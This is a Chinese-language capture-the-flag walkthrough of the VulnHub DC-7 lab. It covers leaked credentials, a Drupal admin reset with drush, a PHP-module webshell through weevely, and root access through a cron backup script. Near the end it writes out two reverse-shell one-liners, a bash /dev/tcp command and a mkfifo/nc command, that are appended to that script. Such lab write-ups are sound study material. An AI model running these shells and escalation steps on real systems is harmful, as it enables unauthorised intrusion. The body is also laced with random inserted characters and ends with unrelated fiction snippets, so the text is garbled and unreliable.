vulnhub DC-7

vulnhub DC-7

信息收集

先查看開放端口,發(fā)現(xiàn)80端口和22端口是開放的,說明可能是拿到web權(quán)限后ssh上去。

image-20200626194031018.png

根據(jù)版本去查看相關(guān)的漏洞

image-20200626194052245.png

提示說沒有漏洞可能修復(fù)了,再結(jié)合作者在主頁給的提示。

image-20200626194124436.png

也不是用密碼爆破的方法去獲得web權(quán)限,然后我就去搜索了下DC7發(fā)現(xiàn)這是作者的一個腦洞乘寒。。匪补。

在底部有一個@DC7USER的用戶去github上或者google上進(jìn)行搜索下可能會有收獲

image-20200626194447517.png

再去把文件看一看找到密碼伞辛。。夯缺。

image-20200626194520133.png

去web界面上登錄一下發(fā)現(xiàn)失敗了蚤氏。。踊兜。

image-20200626194740728.png

但根據(jù)說明肯定就是他了竿滨,然后就去ssh嘗試一下。


image-20200626194912544.png

登錄成功捏境,但是他也沒有什么權(quán)限于游,查看他地下的mbox文件發(fā)現(xiàn)是一封郵件。

image-20200626195312160.png

應(yīng)該是運行cron任務(wù)垫言,運行/opt/scripts/backup.sh這個腳本去執(zhí)行的贰剥。

image-20200626195552351.png

可惜這個腳本對于現(xiàn)在的用戶而言是只讀的,但是對于root用戶和www-data用戶是可以進(jìn)行編輯的

image-20200626195807199.png

我們就得想辦法先切換到www-data用戶筷频,辦法是修改網(wǎng)站的admin用戶蚌成,這個用戶在之前找回密碼的步驟有發(fā)現(xiàn)他的存在。

對于admin用戶的切換方法可以參考下面的文章:

[Drupal] https://www.isfirst.net/drupal/drupal-reset-password Drupal忘記管理密碼重置管理密碼的四種方法(Drupal8/Drupal9)

嘗試第一種drush凛捏,發(fā)現(xiàn)可以使用drush命令

image-20200626200418893.png

修改密碼成功担忧。

image-20200626200449970.png

獲取webshell

在進(jìn)到后臺轉(zhuǎn)了一圈后沒有什么發(fā)現(xiàn),而且對于這個系統(tǒng)的了解太少了坯癣,去google上看了大佬的wp瓶盛,了解到原來可以上傳一個模塊運行php代碼。

[DC-7] https://www.hackingarticles.in/dc7-vulnhub-walkthrough/ walkthrough

image-20200626202334012.png

下載插件完成,并且安裝成功

image-20200626202420210.png
image-20200626202532886.png

打開這個插件成功惩猫。

image-20200626202613920.png

已經(jīng)可以運行php code了窒所,運行weevly去生成一個php shell,并且上傳帆锋,再利用weevly連接shell成功!

image-20200626202930594.png
image-20200626203200256.png

然后就需要往文件中寫入bash命令禽额,但是利用vi好像交互有問題寫不了锯厢。

image-20200626203431766.png

利用echo的方法去寫入文件嘗試

image-20200626203612117.png

上網(wǎng)搜索后發(fā)現(xiàn)有兩種方法去寫

echo "bash -i >& /dev/tcp/192.168.1.64/4444 0>&1" >> /opt/scripts/backups.sh
?
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.64 4444 >/tmp/f" >> backups.sh

利用用戶dc7user進(jìn)行檢查寫入成功(我第一次寫錯了ip。脯倒。实辑。)

image-20200626204052001.png

耐心等待可能運氣不好需要十五分鐘,最終獲得成功T宥剪撬!

image-20200626204626390.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市悠反,隨后出現(xiàn)的幾起案子残黑,更是在濱河造成了極大的恐慌,老刑警劉巖斋否,帶你破解...
    沈念sama閱讀 211,194評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件梨水,死亡現(xiàn)場離奇詭異,居然都是意外死亡茵臭,警方通過查閱死者的電腦和手機(jī)疫诽,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,058評論 2 385
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來旦委,“玉大人奇徒,你說我怎么就攤上這事∮酰” “怎么了摩钙?”我有些...
    開封第一講書人閱讀 156,780評論 0 346
  • 文/不壞的土叔 我叫張陵,是天一觀的道長追葡。 經(jīng)常有香客問我腺律,道長,這世上最難降的妖魔是什么宜肉? 我笑而不...
    開封第一講書人閱讀 56,388評論 1 283
  • 正文 為了忘掉前任匀钧,我火速辦了婚禮,結(jié)果婚禮上谬返,老公的妹妹穿的比我還像新娘之斯。我一直安慰自己,他們只是感情好遣铝,可當(dāng)我...
    茶點故事閱讀 65,430評論 5 384
  • 文/花漫 我一把揭開白布佑刷。 她就那樣靜靜地躺著莉擒,像睡著了一般。 火紅的嫁衣襯著肌膚如雪瘫絮。 梳的紋絲不亂的頭發(fā)上涨冀,一...
    開封第一講書人閱讀 49,764評論 1 290
  • 那天,我揣著相機(jī)與錄音麦萤,去河邊找鬼鹿鳖。 笑死,一個胖子當(dāng)著我的面吹牛壮莹,可吹牛的內(nèi)容都是我干的翅帜。 我是一名探鬼主播,決...
    沈念sama閱讀 38,907評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼命满,長吁一口氣:“原來是場噩夢啊……” “哼涝滴!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起胶台,我...
    開封第一講書人閱讀 37,679評論 0 266
  • 序言:老撾萬榮一對情侶失蹤歼疮,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后诈唬,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體腋妙,經(jīng)...
    沈念sama閱讀 44,122評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,459評論 2 325
  • 正文 我和宋清朗相戀三年讯榕,在試婚紗的時候發(fā)現(xiàn)自己被綠了骤素。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,605評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡愚屁,死狀恐怖济竹,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情霎槐,我是刑警寧澤送浊,帶...
    沈念sama閱讀 34,270評論 4 329
  • 正文 年R本政府宣布,位于F島的核電站丘跌,受9級特大地震影響袭景,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜闭树,卻給世界環(huán)境...
    茶點故事閱讀 39,867評論 3 312
  • 文/蒙蒙 一耸棒、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧报辱,春花似錦与殃、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,734評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽米奸。三九已至,卻和暖如春爽篷,著一層夾襖步出監(jiān)牢的瞬間悴晰,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,961評論 1 265
  • 我被黑心中介騙來泰國打工逐工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留膨疏,地道東北人。 一個月前我還...
    沈念sama閱讀 46,297評論 2 360
  • 正文 我出身青樓钻弄,卻偏偏與公主長得像,于是被迫代替她去往敵國和親者吁。 傳聞我的和親對象是個殘疾皇子窘俺,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,472評論 2 348